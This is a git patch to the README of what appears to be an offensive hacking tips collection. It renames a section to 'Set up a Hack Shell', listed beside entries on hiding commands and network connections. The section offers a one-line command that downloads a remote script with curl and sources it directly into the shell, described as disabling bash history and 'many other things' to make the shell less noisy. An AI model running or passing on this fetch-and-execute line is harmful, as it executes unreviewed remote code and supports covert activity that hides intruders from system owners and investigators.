From 9a47d361a4a61e1e4c300d149614b40d53b8d7c3 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 28 Jun 2024 15:54:13 +0100 Subject: [PATCH] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 080df4c..755b9d2 100644 --- a/README.md +++ b/README.md @@ -11,7 +11,7 @@ We show the tricks 'as is' without any explanation why they work. You need to kn Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Bash](#bash) - 1. [Leave Bash without history](#bash-no-history) + 1. [Set up a Hack Shell](#hackshell) 1. [Hide your commands](#bash-hide-command) 1. [Hide your command line options](#zap) 1. [Hide a network connection](#bash-hide-connection) @@ -114,10 +114,10 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) --- ## 1. Bash / Shell - + **1.i. Set up a Hack Shell (bash):** -Make BASH less noisy. Disables *~/.bash_history*, clears SSH_* and many other things. +Make BASH less noisy. Disables *~/.bash_history* and [many other things](tools/hackshell.sh). ```sh source <(curl -SsfL https://thc.org/hs) ```